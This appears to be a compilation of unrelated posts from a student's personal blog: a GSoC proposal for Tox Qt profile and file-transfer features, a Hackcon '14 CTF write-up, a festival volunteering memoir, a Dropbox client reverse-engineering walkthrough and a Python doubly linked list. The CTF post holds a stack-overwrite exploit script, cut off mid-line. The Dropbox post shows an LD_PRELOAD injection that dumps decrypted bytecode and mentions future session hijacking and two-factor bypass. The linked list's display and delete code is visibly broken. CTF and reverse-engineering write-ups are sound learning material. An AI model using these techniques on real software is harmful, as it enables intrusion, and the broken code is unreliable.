GSoC Proposal: User Profile & File Transfer Support in Tox Qt GUI


Recently, I had applied for Google Summer of Code but I was not able to get through as my mentoring organization did not get enough slots from Google as they applied as an organization for the first time. I applied for User profile & File Transfer support in Tox Qt GUI client.

Short Description:

This project aims at making Tox Qt GUI client more elegant and user friendly by introducing user profile creation, data portability such that users will be able to carry their data in either encrypted or raw format and login from different machines under same profile. Another feature which the project will introduce is the file transfer support  with a nice file transfer manager widget, something similar to Firefox’s download manager.

Project:

The project will be mainly dealing with 2 major tasks. Two of them (user profile support and file transfer support) have something in common: they improve the security & reusability of the client

One of the key goals of the project would be to introduce user profile support in Tox Qt GUI. Currently, Tox Qt GUI does not save the user data, instead it creates a new profile, nothing carries over except the GUI-specific settings. The current proposal aims to introduce the user profile support in the Qt client. Some of the functionalities of the user profile support includes login dialog, import/export dialog, create new profiles,  login using any of already created in Qt GUI profiles, re-log under different profile without restarting the application and export/import profile in raw/encrypted format.

libtoxdata is a new library that provides standardized and secure way to save a user profile on a disc.  Most Tox clients are still saving all user data in raw format, meaning that once a data file is stolen, the user loses accessibility to account, but with this library a user can password-encrypt Tox data file when storing it on a disc. This feature will allow users to carry the data files either in raw or encrypted format and connect to the Tox network from any other machines.

Login dialog

(Mock up UI repo:https://github.com/seshagiriprabhu/gsoc-1)

Consists of two widgets:

1. Existing user widget:

Existing users can enter his/her profile name and password to login. Only users with user data pre-loaded locally would be able advance further to use the messenger. The  “nickname” in the login window is just a profile name, which is always unencrypted, it has nothing to do with the nickname. If password-protected, nickname and other information will be encrypted using that password, but not the profile name, since user would need to differentiate between different encrypted user profiles.

Mockup UI – 1: Login window for existing users

Each user profile would have it’s own folder(lets say: /home/seshagiri/.config/tox/), and each folder would have a user profile file, which is just tox_save() encrypted by libtoxdata, so any client could add support of user profiles just by using that library.

When a user tries to login  using a profile name chosen from the drop down menu of  [Mockup UI – 1], the widget will parse the corresponding .tox file from the profile directory using data_init_load and data_unlock functions

tox_data *profile = data_init_load("/home/seshagiri/.config/tox/whatever.tox");
data_unlock(profile, "password1");

If the data_unlock returns a zero, which means that the login was successful. Next step would be to load the user environment using tox_data function.

uint8_t *buffer;
size_t size = data_read_messenger(profile, &buffer);
tox_load(tox, buffer, size);

2. New user widget:

Mockup UI -2 : Sign up page for new users

A user could create a profile by entering a profile name and password.  A user can create multiple profiles under the same name as the tox core assigns each profiles a hash upon registering. A user will also be able to create “raw profiles” i.e passwordless unencrypted profiles.  When a user creates an account the widget will indeed call data_init_new function of  ProjectTox-libtoxdata.

tox_data* data_init_new(char *path, uint8_t *data_name, uint8_t *password);

The Project will also enable the logout feature that will save/update the tox_data and lock down the profile encrypted using data_write_messenger and data_lock functions.

int data_write_messenger(tox_data *data, uint8_t *buffer, size_t length);
int data_lock(tox_data *data);

Import-Export dialogs

(Import dialog mockup UI repo: https://github.com/seshagiriprabhu/gsoc-2)

(Export dialog mockup UI repo: https://github.com/seshagiriprabhu/gsoc-3)

A simple dialog box with file chooser in it, which will allow to pick any file from the disc. After a user chooses something, the widget would try to parse it as a tox data/profile file and display some informations like profile name, time when the profile was accessed last time etc.
There are currently 3 different tox data files: toxcore raw and libtoxprofile raw and encrypted. These are the two cases which the user profile import/export will encounter:

Profile type Import Export
Case 1:
Only encrypted profile
Allows to import encrypted profiles and raw toxcore data. When user tries to import a raw toxcore data, it will be converted to a tox encrypted profile, i.e. user will be asked to give it profile name and password Allows to export already existing profiles (which are all encrypted tox profiles) as tox encrypted profiles (basically just makes a copy of a selected profile) and raw profiles (just for compatibility with other clients).
Case 2:
Both encrypted and raw profiles
Allows to import encrypted profiles, raw profiles and raw toxcore data. When trying to import raw toxcore data, it can be converted to tox encrypted or raw profiles, i.e. user will have an option to choose. For encrypted the user will be asked for profile name and password, for raw just a profile name. Allows to export already existing profiles (which are all either encrypted tox profiles or raw tox profiles) in all possible formats, i.e.
raw profile → raw profile,
raw profile → encrypted profile,
raw profile → toxcore raw,
encrypted profile → raw profile,
encrypted profile → encrypted profile, encrypted profile → toxcore raw.

Mockup UI – 3: When the import dialog is opened

Mockup UI – 4: The widget displays some of the unencrypted fields of the loaded file

Upon selecting a file the widget will parse the selected file and will display some of the data (profile name, unix timestamp from when the profile was last used, profile type etc)  read from the unencrypted block of the .tox file.

Mockup UI – 5: Import dialog calls an authentication dialog

 Whether its case 1 or 2, the widget will force user to create an encrypted profile when a raw profile is imported. data_init function will be called here to create an encrypted profile.

Mockup UI – 6: When an encrypted profile is imported

 In both case 1 and 2, when a user tries to load an encrypted profile, the widget will prompt user a dialog box to enter the password in-order to unlock his profile. This is done by calling data_unlock function

Mockup UI – 7:, Export dialog box with filters

 After a user logins,  the data is unlocked and hence we could export it to any format we want. The only condition to be checked here is whether a user is logged in or not before exporting. The export widget will indeed call getSaveFileName of QFileDialog which will create a copy of /home/seshagiri/.config/tox/current_user.tox to the directory which user prefers if the current logged in user uses an encrypted profile. This is the code snippet which exports to any of the filter (raw, encrypted or toxcore raw)

QString filename = QFileDialog::getSaveFileName(this,tr("Export Profile"),
                  MySettings.value(DEFAULT_DIR_KEY).toString(),
                  tr(RAW";;"ENC";;"TOX_RAW),&selectedFilter);
if (selectedFilter == RAW) {
      // code for encrypted -> raw or raw -> raw conversion
} elseif (selectedFilter == ENC) {
      // code for enc -> enc or raw -> enc conversion
} else {
      // code for enc -> tox_raw or raw -> tox_raw conversion
}

 File transfer support is the next major task in this project. A new file transfer widget would be introduced as a part of the project. The file transfer widget maintains a list of files transferred between a particular friend and it will be stored in SQLite DB and sorted based on the timestamp of file transfer actions (send, receive, pause, accept and stop).

The file transfer widget is to be located between friend item widget and message display widget. It has two states: opened and close. When a user chats with one of his friends, upon opening the file manager widget, it will display a (file transfer manager) dialog box with a list of files transferred to that particular user using a QListWidget. A global file transfer manager could be accessed from the settings menu which has an embedded filter in-order to facilitate file search based on filename, friend(s), timestamp, send, stopped and received.

Users will be able to upload a file by clicking on the file attachment button at the right corner of the ChatView widget. Upon clicking on file transfer widget, a file transfer manager dialog will pop up.

File Transfer Manager Dialog

(Mockup UI repo: https://github.com/seshagiriprabhu/gsoc-4)

As an effort to bring all the file transfer actions at a single place, the project will introduce a file transfer manager just like the download manager of firefox. All the file transfer history could be accessed from this file transfer manager. The file transfer also consists of a search filter embedded to search based on various filters including: filename, date time of transfer, send, received, to/from a friendID etc.

Mockup UI – 8: File Transfer Manager Mockup UI

The project will enable certain callback functions of the toxcore upon accepting a friend request which includes callback functions like:

  1. File send request
    void tox_callback_file_send_request(Tox *tox, void (*function)(Tox *m, int, uint8_t, uint64_t, uint8_t *, uint16_t, void *), void *userdata);
  2. File control request
    void tox_callback_file_control(Tox *tox, void (*function)(Tox *m, int, uint8_t, uint8_t, uint8_t, uint8_t *, uint16_t, void *), void *userdata);
  3. File data
    void tox_callback_file_data(Tox *tox, void (*function)(Tox *m, int, uint8_t, uint8_t *, uint16_t length, void *), void *userdata);

SQLite database is going to be used as a part of the project for storing the file transfer history of the users. The application will be tweaked to detect an SQLite db file under a specified directory on the disc. If it is not found, the application will create a new database file. This event will happen whenever a user login occurs.

Schema of the file transfer database would look like this:

sqlite> CREATE TABLE transfer_details (
   → ID INTEGER PRIMARY KEY,
   → transfer_role VARCHAR,# transfer_role {send, received, sending, receiving, paused, stopped}
   → timestamp DATETIME,# Will be updated to the current system time when a transfer role changes
   → filename VARCHAR,
   → userID VARCHAR, # Logged in user’s id
   → friendID VARCHAR, # The id of the person at the other end
   → totalFileSize FLOAT, # The actual size of file to be transferred 
   → transferedFileSize FLOAT,# The size of file transferred so far
   → );

SQLite currently does not support data encryption. There is an opensource SQLcipher but it is not available for Qt platform yet. So its upto the user to keep the database file safe on the disc. The project will not use any object relational mapping library rather plain sql queries would be used to access the transfer_details.

If time permits, the project will include an implementation of a spell checker with multilingual support in the input text box widget. Currently, the Tox Qt GUI supports only English language and it doesn’t have spell checker. This proposal aims to integrate a spell checker with the input text box widget which will allow user to fix misspellings by using the spell check. The user would be able to select different language dictionaries from a context menu. Hunspell spell checker will be integrated to the Qt client as it extensively used in most popular open source applications like libreoffice, openoffice, mozilla firefox, thunderbird and chromium. Hunspell has support in  Mac OS X and Windows based operating systems.

Files to be added to the project:

src/logindialog.hpp An interface which is the entry point to the application. The user will be able to use the messenger only after authenticating or signing up. Will be called from starter class before creating mainwindow.
src/importdialog.hpp An dialog box which will import the user profiles. This class also validates the user profile data file and loads the user environment like previous GUI size, friendlist, chat logs etc upon completing the import
src/createuserprofile.hpp A dialog box for creating an encrypted profile. If the imported user profile is raw.
src/validateprofile.hpp A dialog box which asks password of the encrypted user profile which is imported
src/exportdialog.hpp A dialog class which deals with exporting the user profile data to a file. It will allow user to export to these formats: Raw, encrypted and toxcore raw format
src/filetransfermanagerDialog.hpp A dialog box which displays a list of files transferred by the current user. It also has an embedded file filter.
src/filetransferwidget.hpp A widget which maintains a list of files transferred by the current logged in user. This widget will make use of DataBaseManager class for all the database related operations.
src/fileItemDelegate.hpp This class provides display and editing features (pause, resume, stop) for data items of the model used for QTreeView in FileTransferManager dialog.
src/filefilterWidget.hpp A widget for filtering the files based on filename, timestamp, friend, send and received. This widget will also interact with DB.
src/DatabaseManager.hpp An object class for creating, storing, updating, deletion of file transfer data from the SQLite database. This will create a db file on the local disc either if it is destroyed/lost or when the application is opened for the first time.
submodules/ProjectTox-libtoxdata A library for saving and loading encrypted copies of the Tox Messenger using scrypt-jane.
src/spellchecker.hpp A widget which uses the hunspell to check the errors in the words entered in input text widget. The widget will also have a custom menu bar which could be used to get word suggestions if there are any spelling errors and the user could also select other languages using the same.

Profit for Tox Qt GUI

  1. Facilitate the use of Tox Qt GUI by allowing the user to create profile(s) and store the data in encrypted or raw format, thus making the Qt client more intuitive, portable and secure.
  2. A widget for sending and receiving files for the Qt client.
  3. Increasing the reach of Qt client to wide range of people by enabling multilingual support. 

Roadmap

  1. Until mid May: Publish my goals to the Tox Qt GUI community and try to get some feedback and  suggestions on my plans. I will get familiar with the specific Qt GUI internals that I require for my work.
  2. Until June end: Implement the first feature: that means that I will begin with implementing login and user account creation, continue with import/export user profile
  3. Until July end [buffer upto August mid]: Implement the second feature: I will begin designing (hard coded) the UI for transfer widget and continue with implementing the functionalities of the widget i.e send, receive, pause, accept, stop etc.
  4. Until mid August: If the above tasks are completed, integration of the spell checker for input text widget with multi-lingual support and support of notification messages would be implemented.

Detailed timeline

May 12 – May 23 Academical examinations
May 24 – May 27 Discuss implementation details and ideas. Fix some more bugs.
May 28 – June 2 Code the import, export and all the sub dialog boxes
June 3 – June 22 Integrate libtoxdata to Tox Qt GUI code base, validate the login, profile creation, importing raw and encrypted profiles, exporting to raw, encrypted and toxcore raw formats.
June 23 – June 29 Mid review + Testing all the features implemented so far
June 30 – July 6 Code the file transfer manager dialog  + Implementation of FileItemDelegate, FileFilter, FileTransferWidget, DatabaseManger and FileTranferManager
July 7 – July 20 Implement fileSendReceived, fileSendRequestReceived, fileControlReceived, fileDataReceived, fileControlReceived, fileDataReceived, sendFiles, receiveFilesand fileSendCompleted functions.
July 21 – July 27 Implement file drag’n’drop functionality in the message display widget and input text widget and integrate it with file transfer widget
July 28 – Aug 3 Implement search functionality with smart filter (filename, friend(s), timestamp, send and received) in the file transfer manager dialog
Aug 3 – Aug 11 Testing file transfer support
Aug 11 – Aug 22 Final report + if the above tasks are completed a spell checker with multi-lingual support in the input text widget would be implemented
Afterwards Continue testing and bug fixing

Personal Details

  • Full name: Seshagiri Prabhu Narasimha
  • Timezone: UTC +5:30
  • Email Address: seshagiriprabhu@gmail.com
  • IRC username: seshagiri
  • Patches for Tox:  #768, #108and#108
  • Github repo: https://github.com/seshagiriprabhu/
  • Will you treat Google Summer of Code as full time employment?:  Yes
  • How many hours per day will you work?: 7+ hours per day
  • List all obligations (and their dates) that may take time away from GSoC: I have exams starting from May 12th to 23rd. College will re-open in mid July. When the college re-opens, I will be able to work only for 5-6 hours per day.
  • Estimated last day of classes/exams: May 23rd
  • Estimated first day of classes: July 16th

Why Tox Qt GUI

I envy Tox, an open source messaging application that is developed from ground up by putting privacy at the forefront which makes it revolutionary. I have done a few contributions to Tox before.  I have been providing bug reports and patches to Tox from time to time (issues #768, #108). I have also written some other patches that are not yet committed (issues #108).

I have  designed UI for several websites which includes inctf.in, portal.inctf.in etc. In June 2013, I have done a contribution to Sympy,  a python library for symbolic mathematics, in which I replaced the Bareis Fraction free algorithm (with computational complexity of O(n!)) for determining the determinant of matrices with Laplace expansion algorithm which runs on O(n2 ).

Recently, I have won a programming challenge which involved  involved the development of an open source disaster management communication information system for an NGO, Wise Earth Technology. The system consists of mobile communication stations, running on cheap open source hardware (raspberry pi connected to a 5 inch TFT display), supported by a web  application that uses the django web framework. In order to guarantee the peaceful use of this application, while ensuring that the military can use it for rescue operations during disasters, a new Peaceful Open Source License was adopted.

That said, I think that I will succeed in providing clean and fully functional enhancements to the whole project.

Advertisements

Hackcon ’14 binary services


Service 1

We lately (just 2 hours before the contest was about to end) figured out that there were binary 3 services running on the server. And we were able to exploit just before the contest ended.

This is the link to the binary file:

After decompyling the binary, we were able to figure out theory behind the exploit. But as the “raw” socket service was running on a windows server, it took us a long time to figure out “how to exploit”.

  char Str2;
  int v13; 
  int v14; 
  int v15; 

  Str2 = 0;
  v14 = send(s, "Please enter your password: ", 28, 0);
  if ( v14 == -1 )
  {
    v1 = WSAGetLastError();
    printf("send failed with error %d\n", v1);
  }
  v15 = recv(s, &Str2, 36, 0);
  if ( v15 > 0 && v15 < 512 )
  {
    if ( v13 == 'TFSM' )
      read_flag(s);
    else
      read_flag_2(s, &Str2, 32);
  }

Telnet, python sockets etc didn’t work. And finally one of the admins published a hint that putty would be good choice to exploit it. Python telnetlib worked for us finally.
The POC: Our goal is to get the control to the function read_flag() which doesn’t check the password which we are passing. Str2 is 1 byte, we have v15, v14 and v13 on top of Str2. And we need to fill in v13 with TFSM.
Exploit:

import telnetlib, sys
attack_ip = '127.0.0.1'
port = 37517
exploit = "MSFT"*9

con = telnetlib.Telnet(att
con.read_until(':') + "\n"
con.write(exploit + "\n")

Which would print flag like this:

adjfgasdjkfgaskjdfgjkasdhgfhkajs

Hence we lost $500*N*T (N=number of time flags planted in our vuln machine, T=Total no of teams-1) points by not solving this on time.

Service 2

(will be update soon)

Amritavarsham 60: My experience


1175216_650729191626914_1038000067_n
Amritavarsham 60, as expected was the biggest event I have ever attended in my life. I have started my seva on 20th of September as Br. Ashish said there is lack of people in doing sand seva. So I joined them for the first two days (18 hours per day shift). We cleared up around 1 acre of land (near the stage where the VIP’s sit) with coarse sand and with the help of around 150 volunteers.
bunk-beds-for-homestead-center-1
As more than half a million people were expected to attend the b’day, there was accommodation arranged for 6000 people in our college football ground (8 acres of land), 30 tents (each tent capable of accommodating 200 people) were build there for the same. There were only very few (5) tents which was floored properly with tiles. In rest of the tents, the floor had red sands (indeed mud). Hence the accommodation in-charge thought to put the bunker beds for the same. Within a week before the birthday, the Ettimadai metal industry had manufactured the parts for 2500 bunker beds at a record speed. From 22nd morning onward, Br. Hariji (our cyber security Hariji) asked me to help Br. Babuji (he is the incharge of preparing upma and idily in ashram kitchen) to assemble bunker beds. On the first day, we (around 30 people including Vipin sir, Jinesh ettan, some cyber security staffs, ashram inmates and few students  who work under Robotics Srinivasji) were able to assemble only 300-400 bunker beds. As I was new to such work, there were several cuts and wounds on my palm. It took 3 days to heal the wounds and It was really painful (indeed burning) while having food. That’s why I was using a glove during the birthday. A bunker beds sheet had fallen on my feet while unloading from that truck hence my left leg was swollen. I took an anti-septic injection at the end of day 1 from the temporary clinic setup near the darshan stage. But on next day, by Amma’s grace, around 150-200 people from Ettimadai had come there to help and we were able to assemble all the 2500 bunker beds within 24th afternoon. I was surprised how the Tamil devotees were working hard to finish the work. They were so enthusiasts and most of them are working in cultivation field and metal, packaged drinking water industries run by Ashram at Ettimadai. That’s why I think even the kids in their group are working like labors. Amazing stamina they have I would say. Even the head master of Amrita Vidyalaya, Ottapalam was there to help us assembling the beds in all days. On the second day, the ground accommodation in-charge Br. Babuji was impressed by my work and had given me a box spanner which can be used to tighten the nuts within 10 seconds. It takes atleast 2 minutes to tighten a nut using an ordinary spanner.
These 5 days were really good and there was no mental distress as it involved only physical activities (which indeed requires muscle power) and you don’t have to argue with someone. Food will be served at the place where you work and you don’t have to travel at all if you are not planning to have *luxurious* (comparatively) mess food!
Officially, I was one of the food coordinators of VIP/VVIP section, in which my duty was just to carry/transport food from college canteen to VVIP dining hall 1 (guest room near AUMS office) and VVIP dining hall 2 (near Vidyut office) and transport food from temporary kitchen setup near engineering boys hostel to VIP dining hall 3 which is the mechanical class rooms (at the entrance of college). We have to carry the food from the entrance near the Acharya hall all the way to the respective dining hall (around 100-150 meter). And each vessel weighs more than 60 kgs. Except last two days, we were given only first year cse student and most of them were lean and were not capable of capable of carrying food vessels which weighs more than 60 kilograms. So we (me, Bijoy sir (an ex-staff of Amrita), Br. Sudharshan ji (works in cyber security) and Murali sir (husband of Gayathri ma’am, ece dept)) had very hard time carrying heavy vessels.

amma-s-05

As I have mentioned earlier, the food for the VIP dining area is prepared in the engineering boys hostel kitchen and its the same food which is served in common food counters served near the darshan hall. The peculiarity of VIP dining area is one can sit and eat in a neat and clean place. We were told strictly *only to allow* special invites, swamijis, aghoris and people with food coupon on 25th and also for 26th morning breakfast. VIP dining area started functioning from 24th night and it went really smooth till 26th morning (before Sri Narendra Modi arrived). After he arrived it was full of chaos and none of the vehicles were allowed to enter the campus for security reasons. We had to carry food from the entrance gate at the back end of the college to the mechanical class room for the lunch (around 500-600 meters).  There was only single dining hall for VVIPs and VIPs i.e in dining hall 3 (mechanical class room) as Modi and other cabinet ministers had their lunch from dining hall 1 and dining hall 2. The situation became worse as the main food coordinator (name I am not mentioning due to security reasons) of food had issued many food coupons without informing us and left everything on us to handle the situation (so we had to use dynamic management :-P).The 26th night was horrible for the people who had dinner from dining hall 3 as the rice which we had brought from the kitchen was spoiled as it was cooked in the afternoon. Later, they gave us upma as a replacement for the rotten rice. As Amma came to know about the spoiled/rotten rice issue, she appointed Abhayamrita Chaitanya (pro chancellor of our University) to take care of food. And its amazing that only due to this management on 27th September, even though there were 1/2 a million people were there, there were only 3 vessels of rice, 2 pulisherry and 2 avails were left at the end of the day. He has such a good managing capacity and he is such a nice person to talk who has a lot of experience in dealing with various situations.
One of the most funniest conversation which I had with a bramacharini teacher in our campus is given below:
On 26th afternoon, when I was standing at the entrance of the dining area 3, Bri. XOXO  brought 2 of her relatives to counter who didn’t had any ID card or food coupon. She was arguing with me a lot telling so many moral stories about food, hunger and humanity. This is the last dialogue she told me: “You must show some humanity to people”. And I replied: “You must show humanity to your students too”. By hearing this she ran away with her relatives 😛 I just did my duty. Hence I don’t to worry about the consequences. On the same day, initially we were told not to allow any swamiji’s or aghoris from entering the dining hall till 2 PM as there are several VVIPs having their lunch. Dealing with the swamiji’s (not from our Ashram) was the most bitter experience I have ever had in my life. The gaali from Swamiji’s are worse than the politicians. They abused me in various Indic-languages which I think even Google translate cannot understand. Uff! I don’t know how they became swamiji’s and aghoris. I think, congress leader PC George is decent when compared to them.

27th September was the most busy day when compared any other seva days as it was the birthday of our beloved Amma. I just got 1 hour of sleep as the VVIP food counter was wrapped up after Sivamani’s and other cultural event’s were there. All the cultural programme guests were coming and having food from the same dining hall. We had to collect the breakfast from the kitchen and college canteen at 6:00 AM as usual. On 27th, collecting food from the kitchen was the most tedious job as we have to literally fight with Abhayamrita ji and Gopan ji (mess in-charge of Ettimadai campus) to get food. They will always give very less food as they are afraid that we’ll return food back as it was the last day and they cannot reuse it unlike other days. So we had to do several trips to kitchen to collect the food required for the dining hall 3.

 

The lunch on 27th afternoon had given us the most mind stressing work. The main food in-charge had given us the wrong information regarding the count of people who will be having lunch from dining hall 3. The food in-charge had given a count of 1200 people and around 5500+ people had lunch from our count. We ran the counter for more than 4.5 hours to give food for those who came with coupon. When the food transport was not there, I was standing near the entrance to block people without coupons and also fake people who tries to tress pass the queue with various reasons.  As per the initial count, we had brought only 13 vessels of rice and equivalent amount of curry, sambar and payasam for the same. We had to do such 4 trips to feed the people who had come with the token. And that was really tiring. Without the help of S1 M.Tech mechanical students, I would have died then and there due to blood pressure as I had carried around 30 vessels in 4 hours. We had closed the dining hall 3 at 4:30 PM. It was a nice experience to see how people behave vigorously when they are feeling hungry. I have seen various VVIPs including music director Rahul Raj and Dr. Vijay Bhatkar who had waited in the queue along with his family to have Amma’s prasad. Where as its really hard to manage those who are not physically old and enact like old (they come with various diseases starting from gas trouble, diabetes to heat patients). The other set of busy people are news reporters who held up the collar of one of student volunteer for not allowing them to go to the stage through dining hall 3 corridor which is a short cut for them and its sad to know that they are from Amrita TV. A similar incident happened at the entrance of college main gate. As India vision’s sticker less car was stopped by the security guys. The reporters beat two of them. If we had done something against them, they will write something against Amma that’s why we didn’t do anything to the Amrita TV reporters when they tried to tress pass our dining hall 3 security.
A photo taken while transporting food during Amritavarsham 60

A photo taken while transporting food during Amritavarsham 60

Most of the people who tells me that “Your seva is just to have food where as we don’t even get food as we do XYZ seva where I have to sit for A hours daily or we do ABBC seva for H hours, where I have to grab all the wrappers lying down etc”. I have had meal only once from the dining area, rest of the time, I had food from thattukadas and various free food stalls which was installed near the darshan hall, as the food gets over in the dining halls.  My intention for the Amritavarsham 60 was to do a lot of seva beyond my capabilities (stressing my mind and body) and not for being near Amma just to get my face printed on the newspaper photo or in live streaming video.

http://www.youtube.com/watch?v=-eARTqnx_10

 

I am not happy that I was not able to see Amma’s paada pooja or hear Modi’s speech live. I was able to see the completed birthday stage only on 28th night at 1:00 AM i.e when a dance by Oddisi dancers was going on just before Shankar Tucker’s performance (as I was involved in various sevas). Sometime in the day time (1 or 2 hour between lunch and dinner), I used to do security job also. On September 27th night, we chased and caught two young local kids (aged around 16) from the college premises who were taking photographs of the girls sleeping in the lobby. We handed them to the security head Br. Abhiramji.
I stayed awake till 28th morning 8 AM. Then I was not able to control myself. I went and slept in the hostel till 29th 7 AM (23 hours). When I was sleeping I didn’t know what was happening around me. I didn’t even know when Arvind  (my roommate) came to my room and I opened door for him. Before going to sleep, I had my last food on 27th evening i.e Amma’s prasad. When I woke up, I was feeling so hungry and searched for food at Vallikavu. I couldn’t find any shops opened at Vallikkavu as it is Sunday. I went all the way to Parayakadavu and finally found that Theeramaithri  was open. It was like a situation in which a person searches for water in a desert and finally he finds a sea in-front of him. I had 3 full kutti puttu, 2 egg curries and 2 bananas. The bill had come around 50 rupees I gave her a 100 rupee note and asked to feed someone who is poor and hungry for free with the balance amount.
By doing all these sevas, Amma has taught me how to survive in such extreme conditions (sometime without food or without water and under red hot sun i.e while assembling bunker beds), how to manage situations under pressure, how to behave with various people. how to take decisions according to the situations etc. I have learned and leaned a lot at the end of this b’day with a lot of awesome memories and experience which my friends who were not able to attend Amritavarsham 60. I am feeling blessed to be part of Amrita Kudumbam and also to volunteer for Amritavarsham 60. I wish, I could also volunteer for Amritavarsham 70 in 2023. My four months workout at gym has helped me a lot to survive in such extreme condition. Only due to the same, I was able to do a lot (comparative, there are a lot of people who have done more than me) of seva. I wish Amma will give chance and strength to do seva like this always.
Amritavarsham 60: Main stage

Amritavarsham 60: Main stage

Aum Amriteshwayai Namah!

Reversing Dropbox client application for fun


Dropbox is a cloud based file storage service used by more than millions of users. The security of the dropbox was not analyzed properly. Recently, I came across a paper titled Looking inside (Drop)box which was presented at USENIX. Paper explains how to reverse engineer the Dropbox client application and extracts the algorithm. Dropbox clients are mostly written in python. The author of the paper, Dhiru Kholia, has uploaded the essential scripts required to reverse engineer the Dropbox.

Lets start hacking

Unpacking and decrypting encrypted Dropbox bytecode

The first thing to do is to get the Dropbox

wget -O - "https://www.dropbox.com/download?plat=lnx.x86" | tar xzf -

Clone Dhruv’s dedrop repository

➜ (Dropbox) git clone https://github.com/kholia/dedrop

Its mentioned in the paper to run the Dropbox with a custom ld_preload. The shared object required for the custom ld_preload can be build using

➜ cd dedrop/src/dedrop
➜  dedrop (master) ls
all.py  main.c  Makefile  map  _marshal.py  opcode-generator.py  payload.o  payload.py
➜  dedrop (master) make                                                                                                                
objcopy -I binary -O elf32-i386 -B i386 payload.py payload.o
gcc -Wall -ggdb -fPIC -Wno-unused-but-set-variable -m32 -c -I/usr/include/python2.7 -o main.o main.c
gcc -Wall -ggdb -fPIC -Wno-unused-but-set-variable -m32 -shared -Wl,-soname -Wl,libdedrop.so -o libdedrop.so main.o payload.o -lpthread -ldl
➜  dedrop (master)  ls                                                                                                                  
all.py  libdedrop.so  main.c  main.o  Makefile  map  _marshal.py  opcode-generator.py  payload.o  payload.py
Now the shared object is ready for use:
➜ dedrop (master) export BLOB_PATH=$HOME/.dropbox-dist/dropbox
➜ dedrop (master) LD_PRELOAD=$HOME/Dropbox/dedrop/src/dedrop/libdedrop.so ~/.dropbox-dist/dropbox

You may get an output like this:

.
.
[+] writing to /home/seshagiri/Dropbox/dedrop/src/dedrop/pyc_decrypted/xml/sax/xmlreader.pyc
[+] writing to /home/seshagiri/Dropbox/dedrop/src/dedrop/pyc_decrypted/zipfile.pyc

:) :) :) w00t!

All the decrpyted bytecodes in .pyc file format has been written into pyc_decrypted directory

Decompile the decrypted files

I have written a small shell script to decompile all the pyc files in pyc_decrypted directory using uncompyle2 tool.

# /bin/bash
for i in `find | grep .pyc`
do
        filename=${i%%.pyc}
        echo  "Uncompiling $i"
        sudo uncompyle2 $i | head -n-3 > $filename.py
done

find . -name "*.pyc" -exec rm {} \;

We have all the decompiled programs in pyc_decrypt directory. Using these files, you can start building your own open source Dropbox client if you want now.

The authors have mentioned about breaking the two factor authentication used in Dropbox and also hijacking Dropbox accounts. As I am a beginner in RE, I haven’t looked into it further. I will be updating this article later for including the session hijacking and breaking two factor authentication of Dropbox accounts.

We have won a programming challenge


I am extremely happy to inform that we (Avani Lodhaya and me) have won the programming challenge organized by an NGO –  Wise Earth Technologies. Its only due to Amma’s grace and the guidance of Bithin Alangot that we were able to complete the challenge (of course! winning requires a special bragging rights) within time even though we have started working on it just 2 weeks before the deadline. We will receive a cash prize of 1000 Euros for our contribution which I will be handing over to Bithin for his living expenses as he is moving to USA (we worked on the project only for humanitarian purpose and boosting our resume). We have developed Crisis Communicator, an open source disaster management communication information system. The system consists of mobile communication stations, running on cheap open source hardware (Raspberry Pi connected to a 5 inch TFT display), supported by a web application that uses the Django web framework. In order to guarantee the peaceful use of this application, while ensuring that the military can use it for rescue operations during disasters, the system is released under the Peaceful Open Source License. The expected cost of the device will come around $50 – $100 per communication station, enabling its large scale deployment in disaster hit areas. The Crisis Communicator allows the rescue volunteers to connect to other volunteers using APRS (which has no ground infrastructure unlike other communication means like GPRS, 3G, CDMA etc) to obtain live updates about refugees, refugee camps, resource availability, condition of the roads, missing and deceased persons. All the features of the crisis communicator are embedded with the offline OpenStreetMap enabling its use on smart phones or PCs and the response team can add situational awareness and updates by simply tapping on the phone or simple mouse clicks. The application is capable of detecting the positions of the other volunteers using Global Positioning System. A complete user manual of the application can be found here. Here’s the link to the announcement of the winner in the organization’s website.

Below is a screenshot of the application

Below are the news articles published in local news papers (Indian Express and Kerala Kaumadi):

giri120130827155811giri220130827160039

Doubly linked list


In a doubly linked list, each node contains, besides the next-node link, a second link field pointing to the previous node in the sequence. The two links may be called next or previous.

Example

Head -> 12 <-> 15 <-> 6 <-> 11 <- Tail

Code

# /usr/bin/python
# An implementation of doubly linked list

class ListNode:
    def __init__(self, data):
        self.data = data
        self.next = self.previous = None

class List:
    def __init__(self):
        self.head = self.tail = None

    def addFirstNode(self, newNode):
        ''' A function to add the first node to the list '''

        self.head = self.tail = newNode
        self.head.previous = self.tail.next = None

    def addNodeTail(self, data):
        ''' Function to add an element to the tail of the list '''

        newNode = ListNode(data)
        
        # Empty list
        if self.head == None:
            self.addFirstNode(newNode)

        # Non-empty list
        else:
            self.tail.next = newNode
            newNode.previous = self.tail
            self.tail = newNode

        self.tail.next = None

    def addNodeHead(self, data):
        ''' Function to add an element to the head of the list '''

        newNode = ListNode(data)
        
        # Empty list
        if self.head == None:
            self.addFirstNode(newNode)

        # Non-empty list
        else:
            self.head.previous = newNode
            newNode.next = self.head
            self.head = newNode

    def delFirstNode(self):
        ''' Funtion to delete the single node '''
        
        self.previous = self.next = self.head = self.tail = None

    def delNodeTail(self):
        ''' Function to delete an element from the list '''

        node = self.tail
        
        # Empty list
        if self.head == None:
            print "List is empty"
            return

        # Single node list
        elif self.head == self.tail:
            self.delFirstNode()
            return

        # Multiple node list
        else:
            self.tail = node.previous
            self.tail.next = None
            
    def delNodeHead(self):
        ''' Function to delete a node from head '''
         
        node = self.head

        # Empty list
        if self.head == None:
            print "List is empty"
            return

        # Single node list
        if self.head == self.tail:
            self.delFirstNode()
            return

        # Multi-node list
        if self.head != self.tail:
            node = node.next
            node.previous = None
            self.head = node
     
    def delNode(self, element):
        ''' Function to delete a user specified node '''

        node = self.head
        found = False

        # Single node and element is present
        if self.head == self.tail and self.head.data != element:
            print "Element not found in the list"
            return

        # Head contains element
        if self.head.data == element:
            self.delNodeHead()

        # Checks for the element in the list
        while node.next != None:
            if node.next.data == element:
               found = True
               break
            else:
               node = node.next

        # If element was found
        if found:
           if node.next.next != None:
               temp = node.next 
               node.next = temp.next
               node = temp.next.previous

           else:
               self.delNodeTail()
         
        # If the element was not found 
        else:
             print "Element was not found in the list"



def display(list):
    ''' Function to display the linked list '''

    print "\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+"
    node = list.head
    if list.head == None:
        print "Head -> None  ",
        while node is not None:
            print " %d " % (node.data),
            node = node.next 
            if node is not None:
                print "",
        print " <- Tail",
